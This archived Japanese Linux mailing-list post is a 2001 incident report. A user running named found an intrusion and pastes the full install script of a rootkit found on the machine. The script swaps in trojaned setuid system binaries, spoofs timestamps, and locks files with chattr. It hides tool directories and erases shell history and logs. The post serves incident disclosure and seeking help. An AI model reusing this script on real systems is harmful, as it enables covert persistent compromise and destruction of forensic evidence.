[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[plamo:10198] named運用時に作成される怪しいファイルについて
-
From:Kenyu Kawamoto
-
Date:Sat, 16 Jun 2001 00:22:03 +0900
- Subject: [plamo:10198] named運用時に作成される怪しいファイルについて
- From: Kenyu Kawamoto <kenyu_k@xxxxxxxxxxxxx>
- Date: Sat, 16 Jun 2001 00:22:03 +0900
- Posted: Sat, 16 Jun 2001 00:24:11 +0900
川本@横浜です。
「ひょっとしてこれは!!クラック?」
と思ったのでろくに調べもせずに、ここに書き込んでいます。
間違っていたり、勘違いだったらすいません。
namedを運用しようと、DNS-HOWTOを見ながらとりあえずの設定で
運転をはじめたところ、マシンが非常に遅くなったので
psコマンドを実行したところ、身に覚えのない
ccやら、.installなどが実行されていました。
これは!っと思い、これらをkillして回線を物理的に切断し検証したところ
新規に作った/var/namedディレクトリに
rk.tgz
なるファイルと、展開したrkディレクトリが存在しました。
この中には、utilディレクトリがあり、その中には
clear find netstat sl3y st syslogd top wpe
du ls show sniffy str.sh sz var.log
等の怪しげなファイル郡があります。
また、.installスクリプトはどうやらRPCを置き換えるような動作を
しているのです。(最後にこのファイルをペーストしておきます。)
これは、まともな動作じゃないですよね?
とりあえず、今日は常時接続を解除して定期的にこのMLをチェックしよう
と思います。
-----------------------------------------------------------
echo " - Installation ..."
for i in {2,3,4,5}
do
cp -f S80rpcmap /etc/rc.d/rc$i.d/
done
#
mkdir /usr/doc/.spool
mkdir /usr/doc/kern
mkdir /var/log/ssh
#
cd kern
make all
mv string.o /usr/doc/kern/
mv var /usr/doc/kern/
#
cd ../ssh
mv ssh_host_key /var/log/ssh/
mv ssh_random_seed /var/log/ssh
mv squid /usr/doc/.spool/
mv squid.conf /usr/doc/.spool/
#
cd ../utils
mv sniffy sl3y show clear wpe st str.sh /usr/doc/.spool
chattr -i /usr/bin/top > /dev/null 2>&1
touch -acmr /usr/bin/top top
rm -rf /usr/bin/top
mv -f top /usr/bin/top
chmod 4555 /usr/bin/top
#
chattr -i /sbin/syslogd > /dev/null 2>&1
killall -9 syslogd
touch -acmr /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chmod 4555 /sbin/syslogd
#
chattr -i /bin/ls > /dev/null 2>&1
touch -acmr /bin/ls ls
mv -f ls /bin/ls
chmod 4555 /bin/ls
#
#
chattr -i /bin/netstat > /dev/null 2>&1
mkdir -p /usr/lib/kterm
chattr -i /usr/lib/kterm/.1addr > /dev/null 2>&1
chattr -i /usr/lib/kterm/.1proc > /dev/null 2>&1
mv -f .1addr /usr/lib/kterm
mv -f .1proc /usr/lib/kterm
chattr +i /usr/lib/kterm/.1addr
chattr +i /usr/lib/kterm/.1proc
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
mv -f find /usr/bin/find
chmod 4555 /bin/netstat
chmod 4555 /usr/bin/find
#
chattr -i /usr/bin/du > /dev/null 2>&1
touch -acmr /usr/bin/du du
mv -f du /usr/bin/du
chmod 4555 /usr/bin/du
#
chattr -i /usr/src/linux/arch/alpha/lib/.lib/ > /dev/null 2>&1
mkdir -p /usr/src/linux/arch/alpha/lib/.lib/
mv .1file /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/bin/top
chattr +i /bin/netstat
chattr +i /usr/bin/find
chattr +i /sbin/syslogd
#
cd ..
./debug
rm -rf S80rpcmap debug kern/ ssh/ utils/ ../r.tgz ../r2.tgz ../rk.tar.gz ../rk.tgz install
cd kern
/usr/doc/kern/var u var.c > /dev/null 2>&1
cd ../..
rm -rf rk
#news
echo "unset HISTFILE">>/etc/profile
rm -f /sbin/rpc.statd /usr/sbin/rpc.statd
rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
echo -e "\n - Gata ! - Have Phun ! - "
--------------------------------------------
Kenyu Kawamoto
(1)kenyu_k@f6.dion.ne.jp(定期的にみます)
(2)knkawa@hotmail.com(その他出先にて)
--------------------------------------------
- Follow-Ups
-
- [plamo:10199] Re: named運用時に作成される怪しいファイルについて, Etsuo SUMIYA
- [plamo:10200] Re: named運用時に作成される怪しいファイルについて, KOJIMA
[検索ページ]
[メール一覧]
Plamo ML 公開システム